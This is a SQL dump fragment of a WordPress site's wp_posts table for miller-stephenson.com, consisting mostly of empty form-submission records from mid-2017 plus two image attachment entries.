INSERT INTO `wp_posts` VALUES (4614, 0, '2017-06-20 19:01:11', '2017-06-20 19:01:11', '', '', '', 'publish', 'closed', 'closed', '', '4614', '', '', '2017-06-20 19:01:11', '2017-06-20 19:01:11', '', 0, 'https://www.miller-stephenson.com/nf_sub/4614/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4615, 0, '2017-06-20 20:29:37', '2017-06-20 20:29:37', '', '', '', 'publish', 'closed', 'closed', '', '4615', '', '', '2017-06-20 20:29:38', '2017-06-20 20:29:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/4615/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4616, 0, '2017-06-21 14:21:22', '2017-06-21 14:21:22', '', '', '', 'publish', 'closed', 'closed', '', '4616', '', '', '2017-06-21 14:21:22', '2017-06-21 14:21:22', '', 0, 'https://www.miller-stephenson.com/nf_sub/4616/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4617, 0, '2017-06-21 14:23:40', '2017-06-21 14:23:40', '', '', '', 'publish', 'closed', 'closed', '', '4617', '', '', '2017-06-21 14:23:41', '2017-06-21 14:23:41', '', 0, 'https://www.miller-stephenson.com/nf_sub/4617/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4618, 0, '2017-06-22 04:59:18', '2017-06-22 04:59:18', '', '', '', 'publish', 'closed', 'closed', '', '4618', '', '', '2017-06-22 04:59:18', '2017-06-22 04:59:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/4618/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4619, 0, '2017-06-22 14:13:46', '2017-06-22 14:13:46', '', '', '', 'publish', 'closed', 'closed', '', '4619', '', '', '2017-06-22 14:13:46', '2017-06-22 14:13:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/4619/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4620, 0, '2017-06-22 15:08:46', '2017-06-22 15:08:46', '', '', '', 'publish', 'closed', 'closed', '', '4620', '', '', '2017-06-22 15:08:46', '2017-06-22 15:08:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/4620/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4621, 0, '2017-06-22 15:56:27', '2017-06-22 15:56:27', '', '', '', 'publish', 'closed', 'closed', '', '4621', '', '', '2017-06-22 15:56:27', '2017-06-22 15:56:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/4621/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4622, 0, '2017-06-23 00:32:36', '2017-06-23 00:32:36', '', '', '', 'publish', 'closed', 'closed', '', '4622', '', '', '2017-06-23 00:32:37', '2017-06-23 00:32:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/4622/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4623, 0, '2017-06-23 12:02:12', '2017-06-23 12:02:12', '', '', '', 'publish', 'closed', 'closed', '', '4623', '', '', '2017-06-23 12:02:12', '2017-06-23 12:02:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/4623/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4624, 0, '2017-06-23 15:27:04', '2017-06-23 15:27:04', '', '', '', 'publish', 'closed', 'closed', '', '4624', '', '', '2017-06-23 15:27:05', '2017-06-23 15:27:05', '', 0, 'https://www.miller-stephenson.com/nf_sub/4624/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4625, 0, '2017-06-26 05:34:50', '2017-06-26 05:34:50', '', '', '', 'publish', 'closed', 'closed', '', '4625', '', '', '2017-06-26 05:34:51', '2017-06-26 05:34:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/4625/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4626, 0, '2017-06-26 14:01:15', '2017-06-26 14:01:15', '', '', '', 'publish', 'closed', 'closed', '', '4626', '', '', '2017-06-26 14:01:15', '2017-06-26 14:01:15', '', 0, 'https://www.miller-stephenson.com/nf_sub/4626/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4627, 0, '2017-06-26 17:04:57', '2017-06-26 17:04:57', '', '', '', 'publish', 'closed', 'closed', '', '4627', '', '', '2017-06-26 17:04:58', '2017-06-26 17:04:58', '', 0, 'https://www.miller-stephenson.com/nf_sub/4627/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4628, 0, '2017-06-26 18:17:36', '2017-06-26 18:17:36', '', '', '', 'publish', 'closed', 'closed', '', '4628', '', '', '2017-06-26 18:17:36', '2017-06-26 18:17:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/4628/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4629, 0, '2017-06-26 21:19:51', '2017-06-26 21:19:51', '', '', '', 'publish', 'closed', 'closed', '', '4629', '', '', '2017-06-26 21:19:51', '2017-06-26 21:19:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/4629/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4630, 0, '2017-06-26 22:43:48', '2017-06-26 22:43:48', '', '', '', 'publish', 'closed', 'closed', '', '4630', '', '', '2017-06-26 22:43:49', '2017-06-26 22:43:49', '', 0, 'https://www.miller-stephenson.com/nf_sub/4630/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4631, 0, '2017-06-27 05:33:00', '2017-06-27 05:33:00', '', '', '', 'publish', 'closed', 'closed', '', '4631', '', '', '2017-06-27 05:33:00', '2017-06-27 05:33:00', '', 0, 'https://www.miller-stephenson.com/nf_sub/4631/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4632, 0, '2017-06-27 13:03:10', '2017-06-27 13:03:10', '', '', '', 'publish', 'closed', 'closed', '', '4632', '', '', '2017-06-27 13:03:10', '2017-06-27 13:03:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/4632/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4633, 0, '2017-06-27 13:43:26', '2017-06-27 13:43:26', '', '', '', 'publish', 'closed', 'closed', '', '4633', '', '', '2017-06-27 13:43:27', '2017-06-27 13:43:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/4633/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4634, 0, '2017-06-27 15:09:32', '2017-06-27 15:09:32', '', '', '', 'publish', 'closed', 'closed', '', '4634', '', '', '2017-06-27 15:09:32', '2017-06-27 15:09:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/4634/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4635, 0, '2017-06-28 02:50:50', '2017-06-28 02:50:50', '', '', '', 'publish', 'closed', 'closed', '', '4635', '', '', '2017-06-28 02:50:51', '2017-06-28 02:50:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/4635/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4636, 0, '2017-06-28 11:26:01', '2017-06-28 11:26:01', '', '', '', 'publish', 'closed', 'closed', '', '4636', '', '', '2017-06-28 11:26:01', '2017-06-28 11:26:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/4636/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4637, 0, '2017-06-28 12:49:43', '2017-06-28 12:49:43', '', '', '', 'publish', 'closed', 'closed', '', '4637', '', '', '2017-06-28 12:49:43', '2017-06-28 12:49:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/4637/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4638, 0, '2017-06-28 13:35:26', '2017-06-28 13:35:26', '', '', '', 'publish', 'closed', 'closed', '', '4638', '', '', '2017-06-28 13:35:26', '2017-06-28 13:35:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/4638/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4639, 0, '2017-06-29 10:45:46', '2017-06-29 10:45:46', '', '', '', 'publish', 'closed', 'closed', '', '4639', '', '', '2017-06-29 10:45:46', '2017-06-29 10:45:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/4639/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4640, 1428, '2017-06-29 13:05:00', '2017-06-29 13:05:00', '', '', '', 'publish', 'closed', 'closed', '', '4640', '', '', '2017-06-29 13:05:00', '2017-06-29 13:05:00', '', 0, 'https://www.miller-stephenson.com/nf_sub/4640/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4641, 1401, '2017-06-29 14:03:10', '2017-06-29 14:03:10', '', '', '', 'publish', 'closed', 'closed', '', '4641', '', '', '2017-06-29 14:03:10', '2017-06-29 14:03:10', '', 0, 'https://www.miller-stephenson.com/nf_sub/4641/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4642, 0, '2017-06-29 18:54:33', '2017-06-29 18:54:33', '', '', '', 'publish', 'closed', 'closed', '', '4642', '', '', '2017-06-29 18:54:33', '2017-06-29 18:54:33', '', 0, 'https://www.miller-stephenson.com/nf_sub/4642/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4643, 0, '2017-06-29 20:04:53', '2017-06-29 20:04:53', '', '', '', 'publish', 'closed', 'closed', '', '4643', '', '', '2017-06-29 20:04:54', '2017-06-29 20:04:54', '', 0, 'https://www.miller-stephenson.com/nf_sub/4643/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4644, 0, '2017-06-30 00:59:35', '2017-06-30 00:59:35', '', '', '', 'publish', 'closed', 'closed', '', '4644', '', '', '2017-06-30 00:59:36', '2017-06-30 00:59:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/4644/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4645, 0, '2017-06-30 13:14:11', '2017-06-30 13:14:11', '', '', '', 'publish', 'closed', 'closed', '', '4645', '', '', '2017-06-30 13:14:11', '2017-06-30 13:14:11', '', 0, 'https://www.miller-stephenson.com/nf_sub/4645/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4647, 0, '2017-07-03 13:49:54', '2017-07-03 13:49:54', '', '', '', 'publish', 'closed', 'closed', '', '4647', '', '', '2017-07-03 13:49:54', '2017-07-03 13:49:54', '', 0, 'https://www.miller-stephenson.com/nf_sub/4647/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4648, 0, '2017-07-03 15:57:35', '2017-07-03 15:57:35', '', '', '', 'publish', 'closed', 'closed', '', '4648', '', '', '2017-07-03 15:57:35', '2017-07-03 15:57:35', '', 0, 'https://www.miller-stephenson.com/nf_sub/4648/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4649, 0, '2017-07-03 17:56:49', '2017-07-03 17:56:49', '', '', '', 'publish', 'closed', 'closed', '', '4649', '', '', '2017-07-03 17:56:49', '2017-07-03 17:56:49', '', 0, 'https://www.miller-stephenson.com/nf_sub/4649/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4650, 0, '2017-07-03 21:18:58', '2017-07-03 21:18:58', '', '', '', 'publish', 'closed', 'closed', '', '4650', '', '', '2017-07-03 21:18:58', '2017-07-03 21:18:58', '', 0, 'https://www.miller-stephenson.com/nf_sub/4650/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4651, 0, '2017-07-04 03:12:35', '2017-07-04 03:12:35', '', '', '', 'publish', 'closed', 'closed', '', '4651', '', '', '2017-07-04 03:12:36', '2017-07-04 03:12:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/4651/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4652, 0, '2017-07-04 08:51:44', '2017-07-04 08:51:44', '', '', '', 'publish', 'closed', 'closed', '', '4652', '', '', '2017-07-04 08:51:44', '2017-07-04 08:51:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/4652/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4653, 0, '2017-07-04 16:55:33', '2017-07-04 16:55:33', '', '', '', 'publish', 'closed', 'closed', '', '4653', '', '', '2017-07-04 16:55:33', '2017-07-04 16:55:33', '', 0, 'https://www.miller-stephenson.com/nf_sub/4653/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4654, 0, '2017-07-05 08:13:39', '2017-07-05 08:13:39', '', '', '', 'publish', 'closed', 'closed', '', '4654', '', '', '2017-07-05 08:13:40', '2017-07-05 08:13:40', '', 0, 'https://www.miller-stephenson.com/nf_sub/4654/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4655, 0, '2017-07-05 17:18:02', '2017-07-05 17:18:02', '', '', '', 'publish', 'closed', 'closed', '', '4655', '', '', '2017-07-05 17:18:02', '2017-07-05 17:18:02', '', 0, 'https://www.miller-stephenson.com/nf_sub/4655/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4656, 0, '2017-07-06 06:59:57', '2017-07-06 06:59:57', '', '', '', 'publish', 'closed', 'closed', '', '4656', '', '', '2017-07-06 06:59:58', '2017-07-06 06:59:58', '', 0, 'https://www.miller-stephenson.com/nf_sub/4656/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4657, 0, '2017-07-06 07:23:26', '2017-07-06 07:23:26', '', '', '', 'publish', 'closed', 'closed', '', '4657', '', '', '2017-07-06 07:23:26', '2017-07-06 07:23:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/4657/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4658, 0, '2017-07-06 15:45:20', '2017-07-06 15:45:20', '', '', '', 'publish', 'closed', 'closed', '', '4658', '', '', '2017-07-06 15:45:20', '2017-07-06 15:45:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/4658/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4659, 3, '2017-07-06 16:29:01', '2017-07-06 16:29:01', '', 'shutterstock_522668815', '', 'inherit', 'closed', 'closed', '', 'shutterstock_522668815', '', '', '2017-07-06 16:29:01', '2017-07-06 16:29:01', '', 1668, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/shutterstock_522668815.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4660, 3, '2017-07-06 16:32:24', '2017-07-06 16:32:24', '', 'shutterstock_511113739', '', 'inherit', 'closed', 'closed', '', 'shutterstock_511113739', '', '', '2017-07-06 16:32:24', '2017-07-06 16:32:24', '', 1670, 'https://www.miller-stephenson.com/wp-content/uploads/2016/09/shutterstock_511113739.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4661, 0, '2017-07-06 20:21:43', '2017-07-06 20:21:43', '', '', '', 'publish', 'closed', 'closed', '', '4661', '', '', '2017-07-06 20:21:43', '2017-07-06 20:21:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/4661/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4662, 0, '2017-07-07 13:19:29', '2017-07-07 13:19:29', '', '', '', 'publish', 'closed', 'closed', '', '4662', '', '', '2017-07-07 13:19:29', '2017-07-07 13:19:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/4662/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4663, 0, '2017-07-07 14:34:43', '2017-07-07 14:34:43', '', '', '', 'publish', 'closed', 'closed', '', '4663', '', '', '2017-07-07 14:34:43', '2017-07-07 14:34:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/4663/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4664, 0, '2017-07-07 15:06:50', '2017-07-07 15:06:50', '', '', '', 'publish', 'closed', 'closed', '', '4664', '', '', '2017-07-07 15:06:51', '2017-07-07 15:06:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/4664/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4665, 0, '2017-07-07 23:00:12', '2017-07-07 23:00:12', '', '', '', 'publish', 'closed', 'closed', '', '4665', '', '', '2017-07-07 23:00:12', '2017-07-07 23:00:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/4665/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4666, 0, '2017-07-08 10:26:50', '2017-07-08 10:26:50', '', '', '', 'publish', 'closed', 'closed', '', '4666', '', '', '2017-07-08 10:26:50', '2017-07-08 10:26:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/4666/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4667, 0, '2017-07-09 08:10:44', '2017-07-09 08:10:44', '', '', '', 'publish', 'closed', 'closed', '', '4667', '', '', '2017-07-09 08:10:45', '2017-07-09 08:10:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/4667/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4668, 0, '2017-07-10 11:46:23', '2017-07-10 11:46:23', '', '', '', 'publish', 'closed', 'closed', '', '4668', '', '', '2017-07-10 11:46:24', '2017-07-10 11:46:24', '', 0, 'https://www.miller-stephenson.com/nf_sub/4668/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4669, 0, '2017-07-10 13:28:51', '2017-07-10 13:28:51', '', '', '', 'publish', 'closed', 'closed', '', '4669', '', '', '2017-07-10 13:28:51', '2017-07-10 13:28:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/4669/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4670, 0, '2017-07-10 13:49:53', '2017-07-10 13:49:53', '', '', '', 'publish', 'closed', 'closed', '', '4670', '', '', '2017-07-10 13:49:53', '2017-07-10 13:49:53', '', 0, 'https://www.miller-stephenson.com/nf_sub/4670/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4671, 0, '2017-07-10 14:32:31', '2017-07-10 14:32:31', '', '', '', 'publish', 'closed', 'closed', '', '4671', '', '', '2017-07-10 14:32:32', '2017-07-10 14:32:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/4671/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4672, 0, '2017-07-10 17:30:29', '2017-07-10 17:30:29', '', '', '', 'publish', 'closed', 'closed', '', '4672', '', '', '2017-07-10 17:30:29', '2017-07-10 17:30:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/4672/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4673, 0, '2017-07-10 17:35:33', '2017-07-10 17:35:33', '', '', '', 'publish', 'closed', 'closed', '', '4673', '', '', '2017-07-10 17:35:34', '2017-07-10 17:35:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/4673/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4674, 0, '2017-07-10 17:37:14', '2017-07-10 17:37:14', '', '', '', 'publish', 'closed', 'closed', '', '4674', '', '', '2017-07-10 17:37:15', '2017-07-10 17:37:15', '', 0, 'https://www.miller-stephenson.com/nf_sub/4674/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4675, 0, '2017-07-10 18:18:21', '2017-07-10 18:18:21', '', '', '', 'publish', 'closed', 'closed', '', '4675', '', '', '2017-07-10 18:18:22', '2017-07-10 18:18:22', '', 0, 'https://www.miller-stephenson.com/nf_sub/4675/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4676, 0, '2017-07-11 13:41:16', '2017-07-11 13:41:16', '', '', '', 'publish', 'closed', 'closed', '', '4676', '', '', '2017-07-11 13:41:17', '2017-07-11 13:41:17', '', 0, 'https://www.miller-stephenson.com/nf_sub/4676/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4677, 0, '2017-07-11 18:05:14', '2017-07-11 18:05:14', '', '', '', 'publish', 'closed', 'closed', '', '4677', '', '', '2017-07-11 18:05:14', '2017-07-11 18:05:14', '', 0, 'https://www.miller-stephenson.com/nf_sub/4677/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4678, 0, '2017-07-11 19:16:38', '2017-07-11 19:16:38', '', '', '', 'publish', 'closed', 'closed', '', '4678', '', '', '2017-07-11 19:16:38', '2017-07-11 19:16:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/4678/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4679, 0, '2017-07-12 13:52:27', '2017-07-12 13:52:27', '', '', '', 'publish', 'closed', 'closed', '', '4679', '', '', '2017-07-12 13:52:28', '2017-07-12 13:52:28', '', 0, 'https://www.miller-stephenson.com/nf_sub/4679/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4680, 0, '2017-07-12 14:34:46', '2017-07-12 14:34:46', '', '', '', 'publish', 'closed', 'closed', '', '4680', '', '', '2017-07-12 14:34:46', '2017-07-12 14:34:46', '', 0, 'https://www.miller-stephenson.com/nf_sub/4680/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4681, 0, '2017-07-12 22:00:42', '2017-07-12 22:00:42', '', '', '', 'publish', 'closed', 'closed', '', '4681', '', '', '2017-07-12 22:00:42', '2017-07-12 22:00:42', '', 0, 'https://www.miller-stephenson.com/nf_sub/4681/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4682, 0, '2017-07-13 00:49:49', '2017-07-13 00:49:49', '', '', '', 'publish', 'closed', 'closed', '', '4682', '', '', '2017-07-13 00:49:50', '2017-07-13 00:49:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/4682/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4683, 0, '2017-07-13 00:57:07', '2017-07-13 00:57:07', '', '', '', 'publish', 'closed', 'closed', '', '4683', '', '', '2017-07-13 00:57:07', '2017-07-13 00:57:07', '', 0, 'https://www.miller-stephenson.com/nf_sub/4683/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4684, 0, '2017-07-13 01:02:45', '2017-07-13 01:02:45', '', '', '', 'publish', 'closed', 'closed', '', '4684', '', '', '2017-07-13 01:02:45', '2017-07-13 01:02:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/4684/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4685, 0, '2017-07-13 01:09:53', '2017-07-13 01:09:53', '', '', '', 'publish', 'closed', 'closed', '', '4685', '', '', '2017-07-13 01:09:53', '2017-07-13 01:09:53', '', 0, 'https://www.miller-stephenson.com/nf_sub/4685/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4686, 0, '2017-07-13 01:15:28', '2017-07-13 01:15:28', '', '', '', 'publish', 'closed', 'closed', '', '4686', '', '', '2017-07-13 01:15:29', '2017-07-13 01:15:29', '', 0, 'https://www.miller-stephenson.com/nf_sub/4686/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4687, 0, '2017-07-13 01:28:21', '2017-07-13 01:28:21', '', '', '', 'publish', 'closed', 'closed', '', '4687', '', '', '2017-07-13 01:28:21', '2017-07-13 01:28:21', '', 0, 'https://www.miller-stephenson.com/nf_sub/4687/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4688, 0, '2017-07-13 02:09:39', '2017-07-13 02:09:39', '', '', '', 'publish', 'closed', 'closed', '', '4688', '', '', '2017-07-13 02:09:39', '2017-07-13 02:09:39', '', 0, 'https://www.miller-stephenson.com/nf_sub/4688/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4689, 0, '2017-07-13 02:22:00', '2017-07-13 02:22:00', '', '', '', 'publish', 'closed', 'closed', '', '4689', '', '', '2017-07-13 02:22:01', '2017-07-13 02:22:01', '', 0, 'https://www.miller-stephenson.com/nf_sub/4689/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4690, 0, '2017-07-13 09:12:44', '2017-07-13 09:12:44', '', '', '', 'publish', 'closed', 'closed', '', '4690', '', '', '2017-07-13 09:12:45', '2017-07-13 09:12:45', '', 0, 'https://www.miller-stephenson.com/nf_sub/4690/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4691, 0, '2017-07-13 14:14:33', '2017-07-13 14:14:33', '', '', '', 'publish', 'closed', 'closed', '', '4691', '', '', '2017-07-13 14:14:33', '2017-07-13 14:14:33', '', 0, 'https://www.miller-stephenson.com/nf_sub/4691/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4692, 0, '2017-07-13 14:54:56', '2017-07-13 14:54:56', '', '', '', 'publish', 'closed', 'closed', '', '4692', '', '', '2017-07-13 14:54:57', '2017-07-13 14:54:57', '', 0, 'https://www.miller-stephenson.com/nf_sub/4692/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4693, 0, '2017-07-13 15:50:32', '2017-07-13 15:50:32', '', '', '', 'publish', 'closed', 'closed', '', '4693', '', '', '2017-07-13 15:50:32', '2017-07-13 15:50:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/4693/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4694, 0, '2017-07-13 18:23:54', '2017-07-13 18:23:54', '', '', '', 'publish', 'closed', 'closed', '', '4694', '', '', '2017-07-13 18:23:55', '2017-07-13 18:23:55', '', 0, 'https://www.miller-stephenson.com/nf_sub/4694/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4695, 0, '2017-07-14 09:29:31', '2017-07-14 09:29:31', '', '', '', 'publish', 'closed', 'closed', '', '4695', '', '', '2017-07-14 09:29:31', '2017-07-14 09:29:31', '', 0, 'https://www.miller-stephenson.com/nf_sub/4695/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4697, 0, '2017-07-14 16:33:13', '2017-07-14 16:33:13', '', '', '', 'publish', 'closed', 'closed', '', '4697', '', '', '2017-07-14 16:33:13', '2017-07-14 16:33:13', '', 0, 'https://www.miller-stephenson.com/nf_sub/4697/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4698, 0, '2017-07-14 16:45:43', '2017-07-14 16:45:43', '', '', '', 'publish', 'closed', 'closed', '', '4698', '', '', '2017-07-14 16:45:43', '2017-07-14 16:45:43', '', 0, 'https://www.miller-stephenson.com/nf_sub/4698/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4699, 0, '2017-07-14 23:33:49', '2017-07-14 23:33:49', '', '', '', 'publish', 'closed', 'closed', '', '4699', '', '', '2017-07-14 23:33:50', '2017-07-14 23:33:50', '', 0, 'https://www.miller-stephenson.com/nf_sub/4699/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4700, 0, '2017-07-16 01:08:32', '2017-07-16 01:08:32', '', '', '', 'publish', 'closed', 'closed', '', '4700', '', '', '2017-07-16 01:08:32', '2017-07-16 01:08:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/4700/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4701, 0, '2017-07-16 01:21:36', '2017-07-16 01:21:36', '', '', '', 'publish', 'closed', 'closed', '', '4701', '', '', '2017-07-16 01:21:36', '2017-07-16 01:21:36', '', 0, 'https://www.miller-stephenson.com/nf_sub/4701/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4702, 0, '2017-07-17 11:19:18', '2017-07-17 11:19:18', '', '', '', 'publish', 'closed', 'closed', '', '4702', '', '', '2017-07-17 11:19:19', '2017-07-17 11:19:19', '', 0, 'https://www.miller-stephenson.com/nf_sub/4702/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4703, 0, '2017-07-17 12:24:21', '2017-07-17 12:24:21', '', '', '', 'publish', 'closed', 'closed', '', '4703', '', '', '2017-07-17 12:24:21', '2017-07-17 12:24:21', '', 0, 'https://www.miller-stephenson.com/nf_sub/4703/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4704, 0, '2017-07-17 12:35:42', '2017-07-17 12:35:42', '', '', '', 'publish', 'closed', 'closed', '', '4704', '', '', '2017-07-17 12:35:42', '2017-07-17 12:35:42', '', 0, 'https://www.miller-stephenson.com/nf_sub/4704/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4705, 0, '2017-07-17 16:23:20', '2017-07-17 16:23:20', '', '', '', 'publish', 'closed', 'closed', '', '4705', '', '', '2017-07-17 16:23:20', '2017-07-17 16:23:20', '', 0, 'https://www.miller-stephenson.com/nf_sub/4705/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4706, 0, '2017-07-17 18:24:51', '2017-07-17 18:24:51', '', '', '', 'publish', 'closed', 'closed', '', '4706', '', '', '2017-07-17 18:24:51', '2017-07-17 18:24:51', '', 0, 'https://www.miller-stephenson.com/nf_sub/4706/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4707, 0, '2017-07-17 20:39:11', '2017-07-17 20:39:11', '', '', '', 'publish', 'closed', 'closed', '', '4707', '', '', '2017-07-17 20:39:11', '2017-07-17 20:39:11', '', 0, 'https://www.miller-stephenson.com/nf_sub/4707/', 0, 'nf_sub', '', 0); 
